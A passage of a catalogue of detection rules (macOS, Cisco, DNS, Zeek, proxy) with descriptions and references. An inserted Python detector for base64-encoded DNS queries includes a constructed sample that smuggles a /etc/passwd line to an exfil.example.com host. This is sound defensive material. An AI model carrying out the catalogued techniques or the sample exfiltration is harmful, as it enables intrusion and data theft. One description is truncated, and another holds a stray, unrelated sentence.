https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/, https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html, https://www.loobins.io/binaries/launchctl/ |
Local System Accounts Discovery - MacOs |
Detects enumeration of local system accounts on macOS |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md |
Local Groups Discovery - MacOs |
Detects enumeration of local system groups |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
MacOS Network Service Scanning |
Detects enumeration of local or remote network services. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md |
Network Sniffing - MacOs |
Detects the usage of tooling to sniff network traffic.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use SPAN ports to capture a larger amount of data.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md |
File Download Via Nscurl - MacOS |
Detects the execution of the nscurl utility in order to download files. |
https://www.loobins.io/binaries/nscurl/, https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl, https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd |
Suspicious Microsoft Office Child Process - MacOS |
Detects suspicious child processes spawned from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution |
https://redcanary.com/blog/applescript/, https://objective-see.org/blog/blog_0x4B.html |
OSACompile Run-Only Execution |
Detects potential suspicious run-only executions compiled using OSACompile |
https://redcanary.com/blog/applescript/, https://ss64.com/osx/osacompile.html |
Payload Decoded and Decrypted via Built-in Utilities |
Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823 |
Potential Persistence Via PlistBuddy |
Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility |
https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://www.manpagez.com/man/8/PlistBuddy/ |
Remote Access Tool - Team Viewer Session Started On MacOS Host |
Detects the command line executed when TeamViewer starts a session initiated by a remote host.
Once a connection has been established, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
|
Internal Research |
Macos Remote System Discovery |
Detects the enumeration of other remote systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Scheduled Cron Task/Job - MacOs |
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md |
Screen Capture - macOS |
Detects attempts to use screencapture to collect macOS screenshots |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py |
Security Software Discovery - MacOs |
Detects usage of system utilities (only grep for now) to discover security software |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md |
Space After Filename - macOS |
Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md |
Split A File Into Pieces |
Detects use of the "split" command to split files into parts, possibly for transfer. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md |
Osacompile Execution By Potentially Suspicious Applet/Osascript |
Detects potential suspicious applet or osascript executing "osacompile". |
https://redcanary.com/blog/mac-application-bundles/ |
Suspicious Browser Child Process - MacOS |
Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. |
https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml |
Suspicious Execution via macOS Script Editor |
Detects when the macOS Script Editor utility spawns an unusual child process. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685, https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/ |
Potential Discovery Activity Using Find - MacOS |
Detects usage of "find" binary in a suspicious manner to perform discovery |
https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes |
Suspicious History File Operations |
Detects commandline operations on shell history files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Potential In-Memory Download And Compile Of Payloads |
Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware |
https://redcanary.com/blog/mac-application-bundles/ |
Suspicious MacOS Firmware Activity |
Detects manipulation of the firmware password on macOS via the "firmwarepasswd" utility. NOTE: this command is not supported on Apple silicon Macs. |
https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml, https://www.manpagez.com/man/8/firmwarepasswd/, https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web |
System Network Discovery - macOS |
Detects enumeration of local network configuration |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md |
System Information Discovery Using sw_vers |
Detects the use of "sw_vers" for system information discovery |
https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior, https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior, https://ss64.com/osx/sw_vers.html |
User Added To Admin Group Via Sysadminctl |
Detects attempts to create and add an account to the admin group via "sysadminctl" |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/sysadminctl.html |
Guest Account Enabled Via Sysadminctl |
Detects attempts to enable the guest account using the sysadminctl utility |
https://ss64.com/osx/sysadminctl.html |
System Information Discovery Via Sysctl - MacOS |
Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. "sysctl" provides system hardware information.
In this context it is primarily used to detect and evade virtualization and analysis environments.
|
https://www.loobins.io/binaries/sysctl/#, https://evasions.checkpoint.com/techniques/macos.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://objective-see.org/blog/blog_0x1E.html, https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior, https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior |
System Information Discovery Using System_Profiler |
Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
|
https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html, https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf, https://ss64.com/mac/system_profiler.html, https://objective-see.org/blog/blog_0x62.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af |
System Network Connections Discovery - MacOs |
Detects usage of system utilities to discover system network connections |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md |
System Shutdown/Reboot - MacOs |
Detects system shutdown or reboot. Adversaries may shut down or reboot systems to interrupt access to, or aid in the destruction of, those systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md |
Potential Base64 Decoded From Images |
Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
|
https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior, https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior |
Time Machine Backup Deletion Attempt Via Tmutil - MacOS |
Detects deletion attempts of macOS Time Machine backups via the native backup utility "tmutil".
An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/ |
Time Machine Backup Disabled Via Tmutil - MacOS |
Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil".
An attacker can use this to prevent backups from occurring.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/ |
New File Exclusion Added To Time Machine Via Tmutil - MacOS |
Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility.
An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine, https://www.loobins.io/binaries/tmutil/ |
Potential WizardUpdate Malware Infection |
Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset, https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/ |
Gatekeeper Bypass via Xattr |
Detects macOS Gatekeeper bypass via xattr utility |
https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md, https://www.loobins.io/binaries/xattr/ |
Potential XCSSET Malware Infection |
Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08, https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset |
Cisco Clear Logs |
Detects clearing of logs or command history on a Cisco network OS, which is used for defense evasion |
https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html, https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609 |
Cisco Collect Data |
Detects collection of pertinent data from the device configuration files |
https://blog.router-switch.com/2013/11/show-running-config/, https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm, https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html |
Cisco Crypto Commands |
Detects private keys being exported from the device, or new certificates being installed |
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html |
Cisco Disabling Logging |
Detects logging being turned off, locally or remotely |
https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf |
Cisco Discovery |
Detects discovery of information about network devices that is not stored in configuration files |
https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html |
Cisco Denial of Service |
Detects a system being shut down or put into a different boot mode |
None |
Cisco File Deletion |
Detects files being deleted from flash file systems |
None |
Cisco Show Commands Input |
Detects commands being input into the device by other users; full credentials may be present in the command history |
None |
Cisco Local Accounts |
Detects local accounts being created or modified, as well as changes to remote authentication configuration |
None |
Cisco Modify Configuration |
Detects modifications to a configuration that serve an adversary's impact or persistence goals |
None |
Cisco Stage Data |
Detects use of the various protocols that may be used to stage data on the device for exfiltration or infiltration |
None |
Cisco Sniffing |
Detects when a monitor session or a SPAN/RSPAN is set up or modified |
None |
Cisco BGP Authentication Failures |
Detects BGP failures which may be indicative of brute force attacks to manipulate routing |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
Cisco LDP Authentication Failures |
Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
DNS Query to External Service Interaction Domains |
Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE |
https://twitter.com/breakersall/status/1533493587828260866 |
Cobalt Strike DNS Beaconing |
Detects suspicious DNS queries known from Cobalt Strike beacons |
https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ |
Monero Crypto Coin Mining Pool Lookup |
Detects suspicious DNS queries to Monero mining pools |
https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ |
Suspicious DNS Query with B64 Encoded String |
Detects suspicious DNS queries using base64 encoding |
https://github.com/krmaxwell/dns-exfiltration |
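As an added example (not part of this catalogue or the Sigma rule), the following Python applies a base64-label check to DNS query names: a label is flagged when it is long enough to carry data, falls within the base64/base64url alphabet, has high character entropy, and actually decodes once the padding DNS tunnels strip is restored. The query names are constructed, the entropy threshold is an assumption, and so is treating the last two labels as the registrable domain (real code would consult a public-suffix list).

```python
import base64
import binascii
import math
import re

# Base64 (standard or URL-safe alphabet) label of plausible exfil length;
# DNS labels are capped at 63 octets and '=' padding is usually stripped.
B64_LABEL = re.compile(r"^[A-Za-z0-9+/_-]{16,63}$")
ENTROPY_MIN = 3.5        # bits per character (assumed); plain words score well below
REGISTRABLE_LABELS = 2   # assumption: 'example.com'-style domain, no public-suffix list


def shannon_entropy(text):
    n = len(text)
    if n == 0:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_label(label):
    """Decode a padding-stripped base64/base64url label; None if not valid base64."""
    padded = label + "=" * (-len(label) % 4)
    try:
        # altchars maps the URL-safe '-_' onto '+/' before strict validation.
        return base64.b64decode(padded, altchars=b"-_", validate=True)
    except (binascii.Error, ValueError):
        return None


def suspicious_labels(qname):
    """Return the labels of qname (left of the registrable domain) that look like base64 data."""
    labels = qname.rstrip(".").split(".")
    hits = []
    for label in labels[:-REGISTRABLE_LABELS]:
        if not B64_LABEL.match(label):
            continue
        if shannon_entropy(label) < ENTROPY_MIN:
            continue
        if decode_label(label) is not None:
            hits.append(label)
    return hits


# Constructed exfil label: a /etc/passwd line, base64url-encoded, padding stripped.
EXFIL_LABEL = base64.urlsafe_b64encode(b"root:x:0:0:root:/root:/bin/bash").decode().rstrip("=")

# Constructed sample queries (not real DNS telemetry).
SAMPLE_QUERIES = [
    f"{EXFIL_LABEL}.exfil.example.com",
    "www.example.com",
    "aaaaaaaaaaaaaaaaaaaa.example.com",    # long enough, but low entropy
    "d1234abcd5678efgh.cloudfront.net",    # random-looking, but 17 chars is not valid base64
]


def scan(queries):
    """Return (qname, flagged_labels) for every query with at least one suspicious label."""
    return [(q, suspicious_labels(q)) for q in queries if suspicious_labels(q)]


if __name__ == "__main__":
    for qname, labels in scan(SAMPLE_QUERIES):
        print(qname, "->", [decode_label(label) for label in labels])
```

Two caveats a practitioner should keep in mind. Base64 is case-sensitive while DNS is not, so resolvers that apply 0x20 case randomisation, or tunnels that use base32 or hex instead, defeat this check; and long hyphenated hostnames of similar length can pass both the alphabet and entropy tests, so an allowlist of known CDN and service domains is needed before alerting.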
Telegram Bot API Request |
Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind |
https://core.telegram.org/bots/faq, https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/, https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/, https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ |
DNS TXT Answer with Possible Execution Strings |
Detects strings used in command execution in DNS TXT answers |
https://twitter.com/stvemillertime/status/1024707932447854592, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1 |
Wannacry Killswitch Domain |
Detects DNS queries for the WannaCry killswitch domain |
https://www.mandiant.com/resources/blog/wannacry-ransomware-campaign |
Cleartext Protocol Usage |
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.
Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf |
Huawei BGP Authentication Failures |
Detects BGP authentication failures, which may be indicative of brute-force attacks to manipulate routing. |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
Juniper BGP Missing MD5 |
Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute-force attacks to manipulate routing. |
https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf |
MITRE BZAR Indicators for Execution |
Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE. |
https://github.com/mitre-attack/bzar#indicators-for-attck-execution |
MITRE BZAR Indicators for Persistence |
Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE. |
https://github.com/mitre-attack/bzar#indicators-for-attck-persistence |
Potential PetitPotam Attack Via EFS RPC Calls |
Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam.
The usage of this RPC function should be rare, if it is used at all.
Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.
View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc.
|
https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp, https://msrc.microsoft.com/update-guide/vulnerability/ADV210003, https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf, https://threatpost.com/microsoft-petitpotam-poc/168163/ |
Possible PrintNightmare Print Driver Install |
Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675).
The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally or through group policy.
|
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29, https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek, https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527, https://github.com/corelight/CVE-2021-1675, https://old.zeek.org/zeekweek2019/slides/bzar.pdf, https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ |
SMB Spoolss Named Pipe Usage |
Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the spooler service enabled. |
https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608 |
Default Cobalt Strike Certificate |
Detects the presence of the default Cobalt Strike certificate in HTTPS traffic |
https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 |
DNS Events Related To Mining Pools |
Identifies clients that may be performing DNS lookups associated with common currency mining pools. |
https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml |
New Kind of Network (NKN) Detection |
NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> |
https://github.com/nknorg/nkn-sdk-go, https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/, https://github.com/Maka8ka/NGLite |
Suspicious DNS Z Flag Bit Set |
The DNS Z flag is a bit within the DNS protocol header that is, per the IETF design, reserved (unused).
Although recently it has been used in DNSSEC, the value being set to anything other than 0 should be rare.
Otherwise, if it is set to non-0 and DNSSEC is being used, then excluding the legitimate domains is low effort and high reward.
Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one-off or the possibility of larger sensitive file gathering.
This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs
|
https://twitter.com/neu5ron/status/1346245602502443009, https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma, https://tools.ietf.org/html/rfc2929#section-2.1, https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS |
DNS TOR Proxies |
Identifies IPs performing DNS lookups associated with common Tor proxies. |
https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml |
Executable from Webdav |
Detects executable access via WebDAV. Can be seen in APT29 activity, such as in the emulated APT29 hackathon https://github.com/OTRF/detection-hackathon-apt29/ |
http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html, https://github.com/OTRF/detection-hackathon-apt29 |
OMIGOD HTTP No Authentication RCE |
Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote code execution (RCE) as root with just a single unauthenticated HTTP request.
Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).
Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://twitter.com/neu5ron/status/1438987292971053057?s=20 |
WebDav Put Request |
A general detection for the WebDAV user-agent being used to PUT files on a WebDAV network share. This could be an indicator of exfiltration. |
https://github.com/OTRF/detection-hackathon-apt29/issues/17 |
Publicly Accessible RDP Service |
Detects connections from routable IPs to an RDP listener, which is indicative of a publicly-accessible RDP service.
|
https://attack.mitre.org/techniques/T1021/001/ |
Remote Task Creation via ATSVC Named Pipe - Zeek |
Detects remote task creation via at.exe or an API interacting with the ATSVC named pipe |
https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html |
Possible Impacket SecretDump Remote Activity - Zeek |
Detects AD credential dumping using the Impacket secretsdump hacktool. Based on the Sigma rule rules/windows/builtin/win_impacket_secretdump.yml |
https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html |
First Time Seen Remote Named Pipe - Zeek |
This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes |
https://twitter.com/menasec1/status/1104489274387451904 |
Suspicious PsExec Execution - Zeek |
Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if an attacker uses a PsExec client other than the Sysinternals one |
https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html |
Suspicious Access to Sensitive File Extensions - Zeek |
Detects known sensitive file extensions via Zeek |
Internal Research |
Transferring Files with Credential Data via Network Shares - Zeek |
Transferring files with well-known filenames (sensitive files with credential data) using network shares |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Kerberos Network Traffic RC4 Ticket Encryption |
Detects Kerberos TGS requests using RC4 encryption, which may be indicative of Kerberoasting |
https://adsecurity.org/?p=3458 |
Apache Segmentation Fault |
Detects a segmentation fault error message caused by a crashing Apache worker process |
http://www.securityfocus.com/infocus/1633 |
Apache Threading Error |
Detects an issue in Apache logs that reports threading-related errors |
https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md |
Nginx Core Dump |
Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts. |
https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps, https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/ |
Download from Suspicious Dyndns Hosts |
Detects download of certain file types from hosts with dynamic DNS names (selected list) |
https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats |
Windows WebDAV User Agent |
Detects WebDav DownloadCradle |
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html |
Download From Suspicious TLD - Blacklist |
Detects download of certain file types from hosts in suspicious TLDs |
https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap, https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf, https://www.spamhaus.org/statistics/tlds/, https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ |
Download From Suspicious TLD - Whitelist |
Detects executable downloads from suspicious remote systems |
Internal Research |
F5 BIG-IP iControl Rest API Command Execution - Proxy |
Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP |
https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash, https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029, https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516 |
HackTool - CobaltStrike Malleable Profile Patterns - Proxy |
Detects Cobalt Strike malleable profile patterns (URI, User-Agents, Methods). |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile, https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/, https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile |
HackTool - BabyShark Agent Default URL Pattern |
Detects Baby Shark C2 Framework default communication patterns |
https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845 |
HackTool - Empire UserAgent URI Combo |
Detects user agent and URI paths used by empire agents |
https://github.com/BC-SECURITY/Empire |
PUA - Advanced IP/Port Scanner Update Check |
Detects the update check performed by the Advanced IP Scanner and Advanced Port Scanner utilities. |
https://www.advanced-ip-scanner.com/, https://www.advanced-port-scanner.com/ |
PwnDrp Access |
Detects downloads from pwndrop web servers, which were developed for red team testing and are most likely also used for criminal activity |
https://breakdev.org/pwndrop/ |
Raw Paste Service Access |
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form |
https://www.virustotal.com/gui/domain/paste.ee/relations |
Flash Player Update from Suspicious Location |
Detects a Flash Player update from an unofficial location |
https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb |
Suspicious Network Communication With IPFS |
Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages. |
https://blog.talosintelligence.com/ipfs-abuse/, https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11, https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638 |
Telegram API Access |
Detects suspicious requests to Telegram API without the usual Telegram User-Agent |
